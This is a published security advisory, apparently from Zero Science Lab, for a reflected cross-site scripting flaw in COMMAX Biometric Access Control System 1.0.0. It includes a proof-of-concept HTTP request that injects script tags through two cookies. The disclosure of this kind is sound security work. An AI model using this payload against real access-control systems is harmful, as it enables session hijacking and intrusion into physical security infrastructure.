COMMAX Biometric Access Control System 1.0.0 Cross Site Scripting

2021.08.17
Credit: LiquidWorm
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

COMMAX Biometric Access Control System 1.0.0 Cookie Reflected XSS Vendor: COMMAX Co., Ltd. Prodcut web page: https://www.commax.com Affected version: 1.0.0 Summary: Biometric access control system. Desc: The application is vulnerable to an unauthenticated reflected cross-site scripting (XSS) vulnerability. Input passed to the Cookies 'CMX_ADMIN_NM' and 'CMX_COMPLEX_NM' is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and JS code in a user's browser session in context of an affected site. Tested on: nginx/1.14.0 (Ubuntu) MariaDB/10.3.15 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5660 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5660.php 02.08.2021 -- GET /db_dump.php HTTP/1.1 Host: 192.168.1.1 Upgrade-Insecure-Requests: 1 User-Agent: UA/1.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: CMX_SAVED_ID=zero; CMX_ADMIN_ID=science; CMX_ADMIN_NM=lab"><script>confirm(document.domain)</script>; CMX_ADMIN_LV=8; CMX_COMPLEX_NM=ZSL"><script>confirm(window.origin)</script>; CMX_COMPLEX_IP=2.5.1.0 Connection: close


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top